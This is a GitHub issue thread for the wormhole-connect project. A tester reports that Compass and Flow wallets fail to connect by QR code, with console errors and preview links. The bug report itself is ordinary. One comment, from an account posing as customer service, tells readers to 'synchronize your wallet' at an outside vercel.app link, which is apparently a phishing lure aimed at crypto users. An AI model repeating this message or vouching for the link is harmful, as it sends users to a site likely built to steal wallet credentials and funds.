### ISSUE TITLE
[QA] Unable to connect wallet with QR Code (Compass, Flow)

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#3098]
## Describe the current behavior in detail
Issue is reproducible on https://preview.portalbridge.com/7e1e7d6a3d/ and https://deploy-preview-2838--wormhole-connect-mainnet.netlify.app/.

* Behaviour on https://preview.portalbridge.com/7e1e7d6a3d/.
Infinite loading is shown in Compass mobile app after QR Code is scanned. 

https://github.com/user-attachments/assets/81a0fa0e-fd65-461c-8545-29daf2a91317

* Behaviour on https://deploy-preview-2838--wormhole-connect-mainnet.netlify.app/. 
"Connection rejected" error message is displayed on wormhole-connect.
"Requested connection is not supported" error is displayed in Compass wallet mobile app. 

Errors in Console:
```
Error: User rejected
    at main-B1kY4Esc.js:487:40915
    at async Cn (main-B1kY4Esc.js:487:40704)
```
```
[WalletConnector] [ERROR]: Error: User rejected
    at https://deploy-preview-2838--wormhole-connect-mainnet.netlify.app/assets/main-B1kY4Esc.js:487:40915
    at async Cn (https://deploy-preview-2838--wormhole-connect-mainnet.netlify.app/assets/main-B1kY4Esc.js:487:40704)
```

https://github.com/user-attachments/assets/e28cf629-acf7-418e-af7e-844da0ecd64b

## What is the expected/desired behavior

Compass wallet can be successfully connected.

**Comment by tsadovska** [comment]
The same issue appears with Flow Wallet.

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/

**Comment by tsadovska** [comment]
Compass wallet is no longer displayed in the wallets list.
